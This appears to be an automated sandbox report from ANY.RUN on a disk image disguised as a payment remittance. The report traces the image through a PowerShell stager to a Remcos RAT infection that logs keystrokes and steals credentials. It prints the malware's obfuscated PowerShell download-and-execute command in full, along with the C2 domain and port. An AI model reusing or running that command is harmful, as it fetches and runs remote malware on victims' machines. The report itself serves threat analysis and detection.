File name: 191206_payment_remittance.img
Full analysis: https://app.any.run/tasks/ab751574-afcb-4988-b67f-991d8f723d42
Verdict: Malicious activity
Threats:

A keylogger is a type of spyware that infects a system and records every keystroke made on the device. This lets attackers collect victims' personal information, which may include online banking credentials as well as private conversations. The most widespread infection vector for a keylogger is a phishing email or link. Keylogging functionality is also often present in remote access trojans as part of a broader set of malicious tools.

Analysis date: December 06, 2019, 19:26:26
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
trojan
opendir
rat
remcos
keylogger
stealer
Indicators:
MIME: application/x-iso9660-image
File info: UDF filesystem data (version 1.5) '191206_PAYMENT_REMITTANCE'
MD5: DA1F11467ADD18746090DDDFFE5A10E9
SHA1: 7F1F231B20E82180717A3480DA09B552FB7A5A54
SHA256: 92C1BBC3F4EC1417CDA4F93DE199C6BB787F6B24A78E2A8B9E0227FFBFF3B5CD
SSDEEP: 48:5DGkT2csWccTT2cNeWccUrrJAcnZ1lcJO5aBPZhPtNrAIZak6:5DG2xPxUvJ7uO5mPZxrA2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as is. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • eurb.exe (PID: 1008)
      • output.exe (PID: 2820)
      • output.exe (PID: 2308)
      • output.exe (PID: 1968)
      • output.exe (PID: 2512)
      • output.exe (PID: 2892)
    • Changes the autorun value in the registry

      • output.exe (PID: 2820)
    • REMCOS was detected

      • output.exe (PID: 1968)
    • Connects to CnC server

      • output.exe (PID: 1968)
    • Uses NirSoft utilities to collect credentials

      • output.exe (PID: 2512)
    • Actions look like stealing of personal data

      • output.exe (PID: 2512)
    • Stealing of credential data

      • output.exe (PID: 2512)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1508)
      • output.exe (PID: 1968)
    • PowerShell script executed

      • powershell.exe (PID: 1508)
    • Reads the machine GUID from the registry

      • rundll32.exe (PID: 2420)
      • WinRAR.exe (PID: 2600)
      • powershell.exe (PID: 1508)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1508)
      • cmd.exe (PID: 2236)
    • Starts CMD.EXE for command execution

      • eurb.exe (PID: 1008)
    • Application launched itself

      • output.exe (PID: 2820)
      • output.exe (PID: 1968)
    • Writes files like Keylogger logs

      • output.exe (PID: 1968)
  • INFO

    • Manual execution by user

      • rundll32.exe (PID: 2420)
      • powershell.exe (PID: 1508)
      • chrome.exe (PID: 608)
    • Modifies the open verb of a shell class

      • rundll32.exe (PID: 2420)
    • Application launched itself

      • chrome.exe (PID: 608)
    • Reads the hosts file

      • chrome.exe (PID: 2672)
      • chrome.exe (PID: 608)
    • Reads settings of System Certificates

      • chrome.exe (PID: 2672)
    • Reads the machine GUID from the registry

      • chrome.exe (PID: 608)
      • chrome.exe (PID: 2672)
No Malware configuration.

TRiD

.gmc | Game Music Creator Music (13.5)
.abr | Adobe PhotoShop Brush (12)

EXIF

ISO

VolumeName: 191206_PAYMENT_REMITTANCE
VolumeBlockCount: 599
VolumeBlockSize: 2048
RootDirectoryCreateDate: 2019:12:06 06:15:12-08:00
VolumeSetName: UNDEFINED
Software: IMGBURN V2.5.8.0 - THE ULTIMATE IMAGE BURNER!
VolumeCreateDate: 2019:12:06 06:15:12.00-08:00
VolumeModifyDate: 2019:12:06 06:15:12.00-08:00

Composite

VolumeSize: 1198 kB
No data.
Total processes: 61
Monitored processes: 22
Malicious processes: 3
Suspicious processes: 2

Behavior graph: interactive graph available in the full report (process nodes: rundll32.exe, winrar.exe, powershell.exe, eurb.exe, chrome.exe, cmd.exe, output.exe #REMCOS)

Process information

PID: 2872
CMD: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\Desktop\191206_payment_remittance.img
Path: C:\Windows\system32\rundll32.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows host process (Rundll32)
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2420
CMD: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\Desktop\191206_payment_remittance.img
Path: C:\Windows\system32\rundll32.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows host process (Rundll32)
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2600
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\191206_payment_remittance.img"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: rundll32.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Exit code: 0
Version: 5.60.0

PID: 1508
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $qh=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';Set-Alias s $qh;$ew=((New-Object Net.WebClient)).DownloadString('http://worldwidetechsecurity.com/American/Express/amexdata.ps1');s $ew
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 1008
CMD: "C:\Users\Public\eurb.exe"
Path: C:\Users\Public\eurb.exe
Parent process: powershell.exe
User: admin
Company: FINDER ECHIPAMENTE SRL
Integrity Level: MEDIUM
Description: Logs for Anticrash Output
Exit code: 0
Version: 69.19.20

PID: 608
CMD: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Parent process: explorer.exe
User: admin
Company: Google LLC
Integrity Level: MEDIUM
Description: Google Chrome
Exit code: 3221225547
Version: 75.0.3770.100

PID: 2544
CMD: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=75.0.3770.100 --initial-client-data=0x84,0x88,0x8c,0x80,0x90,0x7fef3b93ef8,0x7fef3b93f08,0x7fef3b93f18
Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User: admin
Company: Google LLC
Integrity Level: MEDIUM
Description: Google Chrome
Exit code: 0
Version: 75.0.3770.100

PID: 2696
CMD: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2428 --on-initialized-event-handle=328 --parent-handle=332 /prefetch:6
Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User: admin
Company: Google LLC
Integrity Level: MEDIUM
Description: Google Chrome
Exit code: 0
Version: 75.0.3770.100

PID: 2128
CMD: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1036,11635291794100393042,15002682764359654740,131072 --gpu-preferences=KAAAAAAAAADgAAAgAQAAAAAAAAAAAGAAAAAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=15208929543646220136 --mojo-platform-channel-handle=1052 --ignored=" --type=renderer " /prefetch:2
Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User: admin
Company: Google LLC
Integrity Level: LOW
Description: Google Chrome
Exit code: 0
Version: 75.0.3770.100

PID: 2672
CMD: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=1036,11635291794100393042,15002682764359654740,131072 --lang=en-US --service-sandbox-type=network --service-request-channel-token=15587706921525082056 --mojo-platform-channel-handle=1640 /prefetch:8
Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User: admin
Company: Google LLC
Integrity Level: MEDIUM
Description: Google Chrome
Exit code: 0
Version: 75.0.3770.100
Total events: 3 436
Read events: 3 150
Write events: 0
Delete events: 0

Modification events: no data

Executable files: 2
Suspicious files: 16
Text files: 74
Unknown types: 3

Dropped files

PID 2600, WinRAR.exe
  File: C:\Users\admin\AppData\Local\Temp\Rar$DRa2600.48249\191206_payment_remittance.jpg.lnk
  Type: not recorded
  MD5: not recorded
  SHA256: not recorded

PID 1508, powershell.exe
  File: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EVCZI2GUGLOK8EWUU4BQ.temp
  Type: not recorded
  MD5: not recorded
  SHA256: not recorded

PID 608, chrome.exe
  File: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\12873906-4a1c-402a-9058-79a8670efa5c.tmp
  Type: not recorded
  MD5: not recorded
  SHA256: not recorded

PID 608, chrome.exe
  File: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000018.dbtmp
  Type: not recorded
  MD5: not recorded
  SHA256: not recorded

PID 608, chrome.exe
  File: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old
  Type: text
  MD5: 14482DAD1F122C056BD265B476244053
  SHA256: 721C802E7AC92418185D5A461C393F93880497ECD894635FD804266E7BB41658

PID 608, chrome.exe
  File: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old~RF1311b6.TMP
  Type: text
  MD5: E9FDF4EC197353C827F4D8498F71B0C7
  SHA256: D731F13875E79464A212FB93E6C2ABB5BD50BABD082C776704F19B8DB289C1A1

PID 608, chrome.exe
  File: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF1311d6.TMP
  Type: text
  MD5: 1CBD8789D5BFF9491264746A32F0D401
  SHA256: D2DBBA8A2151EC760279AA04E81BD597587861F4B381AF7347F07EA98A2903E2

PID 608, chrome.exe
  File: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old
  Type: text
  MD5: 5529291668F842DB06C63DC09A59F40D
  SHA256: F2458B90D5BA8A491BDA359B89907CE6E6C653D77AA9AC89864ECCB7803B15F9

PID 1508, powershell.exe
  File: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\c4cea1fc8319e1ac.customDestinations-ms
  Type: binary
  MD5: F4016DF4CA051E6F8628B86825EA15D5
  SHA256: 3B81C9BB171D9F1FDDAEAD8C9AE1C4207A7AFA1E7260084F45CEDB8ACBE3E6A9

PID 608, chrome.exe
  File: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old
  Type: text
  MD5: 1CBD8789D5BFF9491264746A32F0D401
  SHA256: D2DBBA8A2151EC760279AA04E81BD597587861F4B381AF7347F07EA98A2903E2
HTTP(S) requests: 1
TCP/UDP connections: 12
DNS requests: 7
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
1508 | powershell.exe | GET | 200 | 199.188.200.95:80 | http://worldwidetechsecurity.com/American/Express/amexdata.ps1 | US | text | 1.05 Mb | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
1508 | powershell.exe | 199.188.200.95:80 | worldwidetechsecurity.com | Namecheap, Inc. | US | malicious
1968 | output.exe | 174.127.99.132:5050 | top.subaroone.waw.pl | SoftLayer Technologies Inc. | US | malicious
n/a | n/a | 174.127.99.132:5050 | top.subaroone.waw.pl | SoftLayer Technologies Inc. | US | malicious
n/a | n/a | 216.58.193.67:443 | www.gstatic.com | Google Inc. | US | whitelisted
2672 | chrome.exe | 172.217.3.195:443 | clientservices.googleapis.com | Google Inc. | US | whitelisted
2672 | chrome.exe | 216.58.217.35:443 | www.google.de | Google Inc. | US | whitelisted
2672 | chrome.exe | 172.217.3.202:443 | fonts.googleapis.com | Google Inc. | US | unknown
2672 | chrome.exe | 172.217.14.205:443 | accounts.google.com | Google Inc. | US | suspicious

DNS requests

Domain | IP | Reputation
worldwidetechsecurity.com | 199.188.200.95 | malicious
clientservices.googleapis.com | 172.217.3.195 | whitelisted
accounts.google.com | 172.217.14.205 | shared
www.google.de | 216.58.217.35 | whitelisted
fonts.googleapis.com | 172.217.3.202 | whitelisted
www.gstatic.com | 216.58.193.67 | whitelisted
top.subaroone.waw.pl | 174.127.99.132 | malicious

Threats

PID | Process | Class | Message
1968 | output.exe | A Network Trojan was detected | REMOTE [PTsecurity] Backdoor.Win32/Remcos RAT connection
5 ETPRO signatures available at the full report
No debug info